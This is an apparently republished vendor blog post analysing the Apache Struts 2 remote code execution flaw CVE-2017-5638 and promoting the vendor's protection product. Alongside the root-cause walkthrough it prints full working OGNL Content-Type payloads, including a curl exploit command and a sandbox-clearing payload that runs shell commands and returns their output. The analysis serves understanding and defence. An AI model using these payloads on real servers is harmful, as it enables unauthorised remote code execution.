Will it Pwn CVE-2017-5638: Remote Code Execution in Apache Struts 2?

This post was originally published here by AJIN ABRAHAM.

A few days back Nike Zheng reported a Remote Code Execution vulnerability in Apache Struts2. The vulnerability exploits a bug in Jakarta’s Multipart parser used by Apache Struts2 to achieve remote code execution by sending a crafted Content-Type header in the request. This is a perfect example for a vulnerability in third party component. In the real word fixing this vulnerability will take considerable time as it’s not feasible to write a patch for a third party module and updating to a patched version needs proper testing in multiple environments before pushing to production. This blog explains the detailed analysis of the vulnerability, exploitation and how IMMUNIO provides both detection and protection.

Detailed Vulnerability Analysis

The root cause of the vulnerability is that Apache Struts2 by default uses Jakarta’s Multipart parser when the content type header is set to multipart/form-data. A crafted content type header with an OGNL expression passed into Jakarta’s Multipart parser will trigger an exception which is then passed into an error message building function along with the OGNL payload. That function evaluates the OGNL expression resulting in code execution.

Let’s take a detailed look into this vulnerability.

Here is a sample exploit:

%{
(#_=’multipart/form-data’).
(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
(@java.lang.Runtime@getRuntime().exec(‘curl localhost:8000’))
}

If we sent a content type header like the following
Content-Type: %{(#_=’multipart/form-data’).(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(@java.lang.Runtime@getRuntime().exec(‘curl localhost:8000’))}

This will hit the wrapRequest method present in org.apache.struts2.dispatcher.Dispatcher class.

Screen Shot 2017-03-10 at 9.10.21 PM.png

Reference

The payload contains (#_=’multipart/form-data’) which will satisfy the condition and the OGNL payload is passed into Jakarta’s Multipart parser. The parser tries to parse the payload using parse method in org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest class.

Screen Shot 2017-03-10 at 9.40.28 PM.png

Reference

This will result in an exception and the buildErrorMessage method present in org.apache.struts2.dispatcher.JakartaMultiPartRequest is called.

Screen Shot 2017-03-10 at 9.43.07 PM.png

Reference

The execution will further go through couple of methods, findText method calls getDefaultMessage which calls TextParseUtil.translateVariables method that calls
evaluate method which will evaluate the OGNL expression in the payload.

Screen Shot 2017-03-10 at 9.55.12 PM.png

If you consider this OGNL syntax %{ OGNL code }, anything inside %{ } is considered as an OGNL expression and will be evaluated by the OGNL parser. ${ } is also a valid expression.

In our case the following OGNL expression contains Java code that uses getRuntime().exec to execute shell commands. This will be evaluated by the OGNL parser and results in code execution.

(#_=’multipart/form-data’).
(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
(@java.lang.Runtime@getRuntime().exec(‘curl localhost:8000’))

Exploitation

Let’s quickly set up a vulnerable Apache Struts2 web application.

We have the demo application and sample exploits hosted in our github repo: https://github.com/immunio/apache-struts2-CVE-2017-5638
I have already downloaded and configured Tomcat 7 from
https://tomcat.apache.org/download-70.cgi

From apache-struts2-CVE-2017-5638 repository, copy struts2-showcase-2.3.12.war to apache-tomcat/webapps/

Go to apache-tomcat/bin and start the tomcat server by issuing the command
./catalina.sh start

Screen Shot 2017-03-10 at 11.29.01 PM.png

Tomcat will automatically deploy struts2-showcase-2.3.12.war by extracting it to struts2-showcase-2.3.12 under webapps directory.

You can access the structs app by navigating to http://127.0.0.1:8080/struts2-showcase-2.3.12/showcase.action

Screen Shot 2017-03-10 at 11.31.02 PM.png

Now let’s exploit this using the vanilla payload

%{(#_=’multipart/form-data’).
(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
(@java.lang.Runtime@getRuntime().exec(‘curl localhost:8000’))}

The above payload is very basic and we have no way to know if the payload got executed or not.
So we will use an out of band command to connect to our server. I am using the command
curl localhost:8000/apache-struts-cve as it will try to connect to our server.

Let’s quickly run a simple Python server.

python -m SimpleHTTPServer 8000

Let’s run the exploit using curl

curl http://127.0.0.1:8080/struts2-showcase-2.3.12/showcase.action -H “Content-Type: %{(#_=’multipart/form-data’).(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(@java.lang.Runtime@getRuntime().exec(‘curl localhost:8000/apache-struts-cve’))}” >/tmp/foo

Once the payload executes, we can see a GET request log in our Python server which confirms the code execution.

Screen Shot 2017-03-10 at 11.41.27 PM.png

You can also try this out using exploit.py or exploit2.py in apache-struts2-CVE-2017-5638 repository. Both scripts use similar payloads.

Also since we are testing this locally, we can use a fancy payload like this on a Mac.

python exploit.py “open /Applications/Calculator.app”

Screen Shot 2017-03-11 at 5.58.47 PM.png

Lets use the following payload that contains Java code which will open an in memory shell, execute commands and rewrite the HTTP response object with command execution results.

%{
(#_=’multipart/form-data’).
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).
(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
(#ognlUtil.getExcludedPackageNames().clear()).
(#ognlUtil.getExcludedClasses().clear()).
(#context.setMemberAccess(#dm)))).
(#cmd=’whoami’).
(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).
(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).
(#p=new java.lang.ProcessBuilder(#cmds)).
(#p.redirectErrorStream(true)).
(#process=#p.start()).
(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).
(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).
(#ros.flush())
}

We will use exploit3.py to demonstrate this.

Screen Shot 2017-03-10 at 11.51.48 PM.png

Mission Accomplished!

Will IMMUNIO Protect against CVE-2017-5638?

IMMUNIO’s sensors can generate a dynamic whitelist on user input to harden your application helping you to defend against code injection attacks. Here is a quick video that shows exploitation of the vulnerability and how IMMUNIO’s Suspicious Header detection feature can protect against this vulnerability with zero code change.

Photo:The Economist

Ad

No posts to display